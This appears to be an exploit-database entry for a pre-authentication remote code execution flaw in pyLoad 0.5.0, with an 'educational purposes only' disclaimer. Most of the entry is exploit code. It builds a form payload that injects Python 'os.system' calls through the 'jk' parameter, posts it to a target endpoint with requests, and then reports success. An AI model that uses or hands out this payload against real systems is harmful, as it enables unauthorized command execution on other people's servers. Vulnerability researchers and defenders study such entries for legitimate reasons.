Exploits / Vulnerability Discovered : 2023-06-14 |
Type : webapps |
Platform : python
This exploit / vulnerability Pyload 0.5.0 preauth remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
print('[+] The exploit has be executeded in target machine. ')